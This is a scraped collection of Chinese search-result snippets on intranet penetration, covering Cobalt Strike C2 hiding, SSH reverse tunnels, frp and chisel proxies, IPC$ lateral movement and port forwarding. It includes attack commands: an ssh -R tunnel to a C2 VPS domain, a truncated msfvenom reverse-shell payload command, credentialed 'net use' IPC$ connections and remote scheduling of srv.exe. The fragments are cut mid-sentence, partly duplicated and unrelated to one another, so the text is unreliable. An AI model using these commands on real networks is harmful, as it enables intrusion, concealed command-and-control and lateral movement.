1.本地建立C2 ? 2.开启监听 2.1.配置vps域名访问 ? 2.2.开启foreign与beacon监听器 ?...4.建立隧道 4.1vps编辑sshd_config文件允许ssh转发并重启ssh服务 ?...2.mssql突破 DMZ --mssqlproxy 场景:拿到mssql,存在内网,通过mssql 服务作为跳板。对内网进行信息搜集与横向移动。...出现了问题 不能建立链接 2.5.1 解决BUG 通过阅读代码,放在目标机器上分析其存储过程,当一下语句在sql中执行的时候会报错。 ? ?...建立隧道的方式多种多样,根据具体情况分析,内网环境下允许什么什么出网,就用此构建隧道。同时注意如果存在AV,上传的工具是否免杀。
cobaltstrike的隐藏--本地C2 1.本地建立C2 2.开启监听 2.1.配置vps域名访问 2.2.开启foreign与beacon监听器 4.建立隧道 4.1vps编辑sshd_config...文件允许ssh转发并重启ssh服务 4.2建立本地cs与vps的隧道 ssh -C -f -N -g -R 0.0.0.0:80:192.168.3.10:80 root@cs.first.com -...解决方案 通过nginx多级代理结合本地c2隐藏 参考:http://www.0-sec.org/Tools/Cobalt%20Strike/32.html 特殊情况下不出网的解决方案 在内网渗透中,存在防火墙设备...对内网进行信息搜集与横向移动。...,根据具体情况分析,内网环境下允许什么什么出网,就用此构建隧道。
建立内网Windows补丁服务器 建立内网Windows补丁服务器 实施方案 一、完成内网WSUS服务器的架设。 二、对客户端计算机进行设置。 三、进行外网WSUS服务器的架设。...建立内网Windows补丁服务器 众所周知,Windows系统有着种种安全漏洞和不足,这些都要依靠微软发布的一个个补丁来弥补,但公司内网无法访问Internet,,不能及时地下载更新。...但是客户端的自我更新必须通过TCP 80端口,所以需要在默认站点下建立虚拟目录Selfupdate,使没有安装客户端的机器可以自我更新安装客户端。...下面是整个方案中较为重要的一个部分,完成从外网WSUS服务器与内网WSUS服务器之间的数据转移。首先我们需要确保外网服务器和内网服务器的快速安装文件特性和语言设置完全匹配。...此时在内网服务器上执行安装更新的操作即可完成内网客户端计算机的更新。
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。...内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。...首先,当我们登陆上QQ后,我们就会和QQ的服务器建立一个长连接,基于这个长连接,我们可以给QQ服务器发送消息,QQ服务器也可以给我们发送消息(原理和上面百度的类似)。...如果小伙伴此时没有登录QQ,那么QQ服务器将不会给小伙伴发送这条消息,因为QQ服务器此时并没有和小伙伴建立长连接,所以他根本不知道小伙伴的位置。...内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
如果两个域之间需要互相访问,则需要建立信任关系。信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。...在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ?...在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。...DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器...默认情况下,任何由我们建立的用户账号都属于Domain Users组,而任何由我们建立的计算机账号都属于Domain Computers组。 附带一份内网学习思维导图 ? ?
如果两个域之间需要互相访问,则需要建立信任关系。信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。...在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ?...在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。...DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器...默认情况下,任何由我们建立的用户账号都属于Domain Users组,而任何由我们建立的计算机账号都属于Domain Computers组。 附带一份内网学习思维导图 ?
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见...分启动srv.exe(注意这里设置的时间比主机时间快) D:>at \127.0.0.25 10:50 srv.exe 上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序) 补充 建立...ipc$空连接:net use \\10.96.10.59\ipc$ "密码" /user:"" 建立ipc$非空连接: net use \\10.96.10.59\ipc$ "密码".../user:"用户名" 删除ipc$连接: net use \\10.96.10.59\ipc$ /del 如果已经建立了ipc$连接而且有权限的话,把目标主机的C盘映射到本地的Z盘:net...use z: \\10.96.10.59\c$ 取消映射: net use z: /del ps:如果在域内,抓到域管理员的账号密码 建立IPC的时候可以使用域管的账号密码进行连接
三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机...socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。...这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的...socks流量实现对内网主机的访问。...(3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29...日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019...年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。...我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2.
无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。...查看当前正处于等待状态的端口及ip2.查看网络配置ipconfig /all3.查看本地DNS缓存ipconfig /displaydns4.查看路由表route print5.查找有价值的内网...%I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。...这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。...端口识别 扫描内网中同时开放389和53端口的机器。 端口:389服务:LDAP、ILS说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。...某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知...四、小结 SMB协议用于实现共享,IPC用于建立连接,不连接怎么共享?...其中上图中说到,psexec第二种方法和smbexec无需建立IPC连接,我认为是不合理的。...这几种方法只是命令不同罢了,提供明文账户密码的时候也是要建立IPC连接的,因为这个利用就是基于IPC的共享。
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是......前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。
(Windows的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机...内网中存在另外一台主机,这里假设内网存在一台Web服务器。然后,我们现在要将公网Web服务器设置为代理,通过公网服务器的80端口,访问和探测内网Web服务器的信息。...,比如 Proxifier 、sockscap64 Netsh实现端口转发 Netsh 是Windows自带的命令行脚本工具,它可以建立端口映射。...Netsh实现SSH到内网主机(远程端口转发) 现在我们有这么一个环境,我们获得了公网服务器的权限,并且通过公网服务器进一步的内网渗透,得到了内网主机的权限。拓扑图如下。...Windows服务器的权限,并且通过公网服务器进一步的内网渗透,得到了内网Linux主机的权限。
外网 访问内网服务器。...# frp(提供软件服务) 通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括: 客户端服务端通信支持 TCP、KCP 以及 Websocket...采用 TCP 连接流式复用,在单个连接间承载更多请求,节省连接建立时间。 代理组间的负载均衡。 端口复用,多个服务通过同一个服务端端口暴露。...# 第三步:配置 服务端和客户端 目录介绍:frpc前缀的文件是内网服务需要的;frps前缀的文件是公网IP需要的。...# 内网服务需要配置frpc.ini文件 按需求进行配置信息,除基础信息配置common外,其他的根据自己需求进行摘选(每一个标签都是一个独立的模块)。
前言 整理下内网渗透的思路 一、整体概述 1、攻击思路 攻击思路主要有2种: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者...一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。...SSH 为 Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。...参考: https://sqoop.apache.org/docs/1.99.7/security.html 5、HBase HBase建立在HDFS之上,提供高可靠性、高性能、列存储、可伸缩、实时读写的数据库系统...zhuanlan.zhihu.com/p/34991269 https://github.com/gentilkiwi/mimikatz/releases http://blog.gentilkiwi.com/mimikatz (三)建立后门
成功访问到内网服务器远程桌面: ? 反向端口转发 假设这次拿下了外网服务器、内网服务器的命令行权限,并知道内网服务器账号、密码。 想要通过攻击机,远程连接内网服务器远程桌面服务。...但由于内网防火墙包过滤策略,不允许外网服务器访问它。 此时可以通过反向端口转发,由内网服务器主动发起转发。 ?...Part.2 Netsh 本地端口转发 Netsh 是Windows自带的命令行脚本工具,它可以建立端口映射。与LCX不同,netsh不支持反向的端口转发。 本地端口转发: ?...使用时需要配合webshell建立一个SOCKS代理来进行内网穿透,支持多种类型的webshell: ? 以下面的拓扑为例,外网服务器是一个jsp服务器,对外网开放80服务,且存在文件上传漏洞。...攻击机通过与外网服务器建立http隧道,来访问内网服务。 ? 先将tunnel.jsp上传至外网服务器,并能够访问到: ?
内网穿透 为什么要要内网穿透?...1 我们的内网的数据库,IIS,FTP等等网络服务要为外网的用户使用. 2 开发上的用途 原来我们要调试一个公众号,支付测试,要使用自己搭建的服务器,而且要能被外网所访问,而我们内网搭建的服务器就要使用内网穿透的技术了...方法一:最新的花生壳开源产品 方法二:Sunny-Ngrok内网转发 一、创建花生壳应用 登录Oray开发者平台,申请成为开发者。创建花生壳应用同时获得AppID和AppKey。...Sunny-Ngrok内网转发 一: 注册账户 二: 选择要通的账户,当然是哪个免费选哪个咯 三: 选择要开通的隧道 隧道名称:可以随便填写,无关紧要只是为了一个备注 前置域名:服务器免费赠送的域名,请不要带上后缀
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
